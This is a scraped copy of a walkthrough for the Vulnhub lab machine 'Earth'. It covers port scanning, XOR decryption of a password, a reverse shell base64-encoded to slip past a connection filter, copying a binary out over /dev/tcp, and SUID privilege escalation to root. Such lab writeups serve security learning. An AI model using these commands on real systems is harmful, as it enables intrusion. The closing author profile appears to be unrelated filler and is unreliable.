Earth - The Planets - Vulnhub - Writeup — Security (2024)

Earth is a CTF machine from Vulnhub created by SirFlash. This is the third machine from his series “The Planets” and the previous machine “Venus” was equally great. As the author said, the difficulty is subjective to the experience. And, for me, I had to take hints for the root privilege escalation. The machine works well on VirtualBox. “Earth – The Planets – Vulnhub – Writeup”

Link to the machine:,755/

Step 1: Identify the IP address

As usual, I started the enumeration by identifying the IP address of the target machine (because I use machines on headless mode to avoid disturbances).

┌──(kali㉿kali)-[~/vulnhub/earth]└─$ fping -aqg

As we can see, the IP address of my machine is and that of the target is

Step 2: Scan open ports

Next, I scanned the open ports on the target.

┌──(kali㉿kali)-[~/vulnhub/earth]└─$ nmap -v -T4 -p- -sC -sV -oN nmap.log Nmap 7.92 scan initiated Wed Dec 15 19:47:53 2021 as: nmap -v -T4 -p- -sC -sV -oN nmap.log scan report for is up (0.032s latency).Not shown: 65209 filtered tcp ports (no-response), 323 filtered tcp ports (host-unreach)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.6 (protocol 2.0)| ssh-hostkey: | 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9|_http-title: Bad Request (400)443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)|_http-title: Bad Request (400)| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space| Subject Alternative Name: DNS:earth.local,| Issuer: commonName=earth.local/stateOrProvinceName=Space| Public Key type: rsa| Public Key bits: 4096| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2021-10-12T23:26:31| Not valid after: 2031-10-10T23:26:31| MD5: 4efa 65d2 1a9e 0718 4b54 41da 3712 f187|_SHA-1: 04db 5b29 a33f 8076 f16b 8a1b 581d 6988 db25 7651|_ssl-date: TLS randomness does not represent time|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9| tls-alpn: |_ http/1.1Read data files from: /usr/bin/../share/nmapService detection performed. Please report any incorrect results at .# Nmap done at Wed Dec 15 19:53:47 2021 -- 1 IP address (1 host up) scanned in 353.64 seconds

From the SSL certificate, I found two hostnames.

443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)|_http-title: Bad Request (400)| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space| Subject Alternative Name: DNS:earth.local,

So, I added these on my /etc/hosts file. earth.local

Step 3: Enumerate the webserver

In the earth.local site, we have some encrypted messages that are signed with some keys.

Earth - The Planets - Vulnhub - Writeup — Security (1)

Hence, we must identify the technique of the encryption. However, since we know it uses a message key, we have to identify it first.

This information is located in robots.txt of the website.

┌──(kali㉿kali)-[~/vulnhub/earth]└─$ curl -kUser-Agent: *# ... snip ... Disallow: /testingnotes.*

Here, we can see there is a “testingnotes.*” file. Since this is a note, I guessed it would be a .txt file.

┌──(kali㉿kali)-[~/vulnhub/earth]└─$ curl -kTesting secure messaging system notes:*Using XOR encryption as the algorithm, should be safe as used in RSA.*Earth has confirmed they have received our sent messages.*testdata.txt was used to test encryption.*terra used as username for admin portal.Todo:*How do we send our monthly keys to Earth securely? Or should we change keys weekly?*Need to test different key lengths to protect against bruteforce. How long should the key be?*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

From the note, we can confirm that the encryption algorithm is XOR and the key might be from testdata.txt. Likewise, the username for the admin portal is terra. Also, the admin portal is /admin on the other website.

┌──(kali㉿kali)-[~/vulnhub/earth]└─$ curl -k According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

With this information, I opened CyberChef and searched for XOR. I put the above text in the key part of CyberChef with UTF-8 input. The following message gave me the possible password of the user terra.

Earth - The Planets - Vulnhub - Writeup — Security (2)

With the password, I logged in earth.local/admin portal that gives us a CLI input.

Earth - The Planets - Vulnhub - Writeup — Security (3)

When I try to spawn a reverse shell, it says that remote connections are forbidden. This is because I used an IP address. Thus, we can bypass this by converting it to its decimal notation. Or, we can encode the command in the base64 format.

┌──(kali㉿kali)-[~/vulnhub/earth]└─$ echo 'nc -e /bin/bash 9001' | base64bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMC40IDkwMDEK

Next, I listened on the port 9001.

┌──(kali㉿kali)-[~/vulnhub/earth]└─$ nc -nlvp 9001Ncat: Version 7.92 ( )Ncat: Listening on :::9001Ncat: Listening on

After this, I could use the base64 payload to spawn the reverse shell as follows.

echo bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMC40IDkwMDEK | base64 -d | bash
┌──(kali㉿kali)-[~/vulnhub/earth]└─$ nc -nlvp 9001Ncat: Version 7.92 ( )Ncat: Listening on :::9001Ncat: Listening on Connection from Connection from gid=48(apache) groups=48(apache)

We have to upgrade the shell after this.

Upgrade to an intelligent reverse shell

Step 4: Root privilege escalation

Once I had a proper shell, I checked for the SUID binaries.

bash-5.1$ find / -perm -u=s 2>/dev/null# ... snip .../usr/bin/reset_root# ... snip ...

When I checked the strings, I saw that it would change the password of the user root.

bash-5.1$ strings /usr/bin/reset_root /lib64/]\UHcredentiHals rootH:theEartHhisflat[]A\A]A^A_CHECKING IF RESET TRIGGERS PRESENT...RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswdRESET FAILED, ALL TRIGGERS ARE NOT PRESENT.;*3$"# ... snip ...puts@GLIBC_2.2.5_edatasystem@GLIBC_2.2.5__libc_start_main@GLIBC_2.2.5magic_cipher# ... snip ...mainaccess@GLIBC_2.2.5__TMC_END__setuid@GLIBC_2.2.5# ... snip ...

However, when I ran the script, I got the message RESET FAILED, … Thus, I copied the binary to my local machine.

nc -nlvp 9002 > reset_root
cat /usr/bin/reset_root > /dev/tcp/

Next, I gave it the executable permission.

chmod +x reset_root

The other thing I did was reverse engineer the code.

Earth - The Planets - Vulnhub - Writeup — Security (4)

As we can see, there is a function magic_cipher. Likewise, the password change operation only occurs when three conditions are met. So, we can use ltrace binary to trace the library calls of an ELF binary.

┌──(kali㉿kali)-[~/vulnhub/earth]└─$ ltrace ./reset_rootputs("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...) = 38access("/dev/shm/kHgTFI5G", 0) = -1access("/dev/shm/Zw7bV9U5", 0) = -1access("/tmp/kcM0Wewe", 0) = -1puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.) = 44+++ exited (status 0) +++

From the output, we should make that three files on the shown locations should be present to run the trigger. Therefore, I created those files on the target. Lastly, when I ran the binary, it changed the password of the root.

bash-5.1$ touch /dev/shm/kHgTFI5G /dev/shm/Zw7bV9U5 /tmp/kcM0Wewebash-5.1$ reset_root CHECKING IF RESET TRIGGERS PRESENT...RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earthbash-5.1$ su -lPassword: [root@earth ~]# iduid=0(root) gid=0(root) groups=0(root)[root@earth ~]#

Also read: Writeup of Titan from HackMyVM – Walkthrough

Earth - The Planets - Vulnhub - Writeup — Security (2024)
Top Articles
Latest Posts
Article information

Author: Nathanael Baumbach

Last Updated:

Views: 5626

Rating: 4.4 / 5 (55 voted)

Reviews: 94% of readers found this page helpful

Author information

Name: Nathanael Baumbach

Birthday: 1998-12-02

Address: Apt. 829 751 Glover View, West Orlando, IN 22436

Phone: +901025288581

Job: Internal IT Coordinator

Hobby: Gunsmithing, Motor sports, Flying, Skiing, Hooping, Lego building, Ice skating

Introduction: My name is Nathanael Baumbach, I am a fantastic, nice, victorious, brave, healthy, cute, glorious person who loves writing and wants to share my knowledge and understanding with you.